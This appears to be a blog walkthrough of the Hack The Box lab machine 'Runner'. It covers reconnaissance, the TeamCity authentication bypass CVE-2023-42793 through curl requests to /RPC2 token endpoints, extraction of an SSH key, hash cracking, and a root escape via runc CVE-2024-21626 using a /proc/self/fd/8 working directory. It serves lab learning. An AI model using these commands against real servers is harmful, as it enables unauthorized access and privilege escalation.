Post

HTB Runner

HTB Runner

Hack the Box Runner:

Box info:

Link: https://app.hackthebox.com/machines/Runner

“About Runner Runner is a medium difficulty Linux box that contains a vulnerability (CVE-2023-42793) in TeamCity. This vulnerability allows users to bypass authentication and extract an API token, which can be used to enable debug features for executing system commands. By gaining access to a TeamCity docker container and compressing the HSQLDB database files, we can extract credentials for the user matthew and find an SSH key for john. After cracking the password, we can authenticate on the host filesystem. Upon inspecting the /etc/hosts file, we discover a running Portainer instance. Using matthew's credentials, we access the subdomain externally. While authenticated, we find that we can create imgs/images, but our privileges are limited. After checking the version of runc on the host, we exploit a vulnerability (CVE-2024-21626) through the imgs/image build function of Portainer, which allows us to create a SUID bash file on the host.”

  • Difficulty: Medium

Recon:

First we can start out by pinging the machine to make sure it’s up.

ping <ip> lets

alt text

Perfect, now let’s run a namp scan of the machine I am going to use -sC -sV.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
 nmap -sV -sC 10.10.11.13                    
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-12 14:11 EST
Nmap scan report for 10.10.11.13
Host is up (0.15s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 3e:ea:45:4b:c5:d1:6d:6f:e2:d4:d1:3b:0a:3d:a9:4f (ECDSA)
|_  256 64:cc:75:de:4a:e6:a5:b4:73:eb:3f:1b:cf:b4:e3:94 (ED25519)
80/tcp   open  http        nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://runner.htb/
8000/tcp open  nagios-nsca Nagios NSCA
|_http-title: Site doesn't have a title (text/plain; charset=utf-8).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel


Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 36.13 seconds


Lets add runner.htb to the hosts file and then checkout the http site:

sudo vi etc/hosts

then add

10.10.11.13 runner.htb

Now the page can be visited at http://runner.htb/ or the machine ip.

alt text

For starters gobuster can be run against this site to look for subdomains and dirs.

I am using the top subdomains 20000 lists from seclists

https://github.com/danielmiessler/SecLists/blob/master/Discovery/DNS/subdomains-top1million-20000.txt

gobuster vhost -w wordlist.txt -u http://runner.htb --append-domain

This resulted in no results found….

After getting stuck for a bit I shifted to using a bigger subdomain list:

https://github.com/danielmiessler/SecLists/blob/master/Discovery/DNS/bitquark-subdomains-top100000.txt

gobuster vhost -w subdomains_100000.txt -u http://runner.htb --append-domain

alt text

This results in the subdomain TeamCity being found.

I later found out you can make custom wordlists with a tool called cewl

https://github.com/digininja/CeWL

cewl http://runner.htb -w runner_wordlist.txt

gobuster vhost -w runner_wordlist.txt -u http://runner.htb --append-domain

alt text

This worked significantly faster than using a giant wordlist.

After we get the domain TeamCity.runner.htb we have to add it to our hosts file like we did before.

sudo vi etc/hosts then add 10.10.11.13 TeamCity.runner.htb

Now we can view the page which appears to be a login.

alt text

Exploiting:

If we search the web for the version number posted at the bottom of the page we can find multiple examples of vulns being reported.

alt text

alt text

With this info we can use the exploit script posted on exploit DB:

python3 jetbrains_ex.py -u "http://teamcity.runner.htb"

alt text

We can now use the creds to sign in:

alt text

Here is a link to more info about the TeamCity vuln: https://www.sonarsource.com/blog/teamcity-vulnerability/

The TLDR of the vuln is that you can send requests to the site and as long as the path ends in /RPC2 you can avoid auth checks.

An example:

curl <site_url>/app/rest/users/id:1/tokens/RPC2 -X POST

id:1 - is for the admin user.

returns:

“Token already exists”

We can send a delete request and then re-post:

curl <site_url>/app/rest/users/id:1/tokens/RPC2 -X DELETE

curl <site_url>/app/rest/users/id:1/tokens/RPC2 -X POST

it will return a token that can be used to authenticate and create an admin account.

Returning to the site we can examine the users page:

alt text

I initially tried to simply change this “John” user’s password and then ssh in with it but that did not work.

alt text

We can also find the option to backup the server.

alt text

We can download this and then poke around.

alt text

alt text

You might be able to crack those hashes but I quickly found a ssh key

alt text

We should be able to use this to ssh into the machine.

alt text

We have to change the perms on the key but we should get in after that

chmod 600 id_rsa

and we get in.

alt text

We also have our first flag:

alt text

Enum:

First I tried ps -ef with no success.

alt text

Next I used netstat -lantp:

alt text

After viewing all the listening ports I tried to curl each one.

1
2
3
4
5
curl localhost:8111
Authentication required
To login manually go to "/login.html" page


curl localhost:9000

Results in a large dump of html lets checkout port 9000.

You can also figure this out by inspecting the /etc/hosts file.

Lets setup some port forwarding and then checkout the page…

ssh -L 9000:127.0.0.1:9000 john@10.10.11.13 -i id_rsa

Then navigating to the local 127.0.0.1:9000 we can find the page.

alt text

Cracking

Well it appears we need a login so maybe I should have cracked those hashes earlier… anyway lets do it now.

alt text

lets clean these up and add them to a file

alt text

I also removed the accounts I made while exploiting:

alt text

This should speed things up…

I was originally using hashcat… but my kali vm was too weak.

alt text

So I used john and added some ram.

alt text

After entering those creds we are in.

alt text

Vuln Searching:

This next part kinda sucked and I was stuck googling portanier vulns… After looking around I googled the docker version “Docker version 25.0.3, build 4debf41 vulns

I found this:

https://www.docker.com/blog/docker-security-advisory-multiple-vulnerabilities-in-runc-buildkit-and-moby/

Here we can find a bunch of vulns for docker.

alt text

As well while googling I found the vuln listed in several write-ups of this box.

alt text

The RUNC vuln we need to use is detailed here:

https://securityvulnerability.io/vulnerability/CVE-2024-21626

https://nitroc.org/en/posts/cve-2024-21626-illustrated/#exploit-via-setting-working-directory-to-procselffdfd

In order to exploit this we need to make a container. We are going to use the teamcity image.

alt text

After that we set the working dir to /proc/self/fd/8.

alt text

Once the container is made we can log into a shell as root and claim the flag after navigating the somewhat weird filesystem.

alt text

alt text

Conclusion:

This box was pretty fun, but the second half was definitely trickier than the first half. I am not well versed on the details of the second vulnerability, but the article linked above gives a really great breakdown of how the vulnerability works.

This post is licensed under CC BY 4.0 by the author.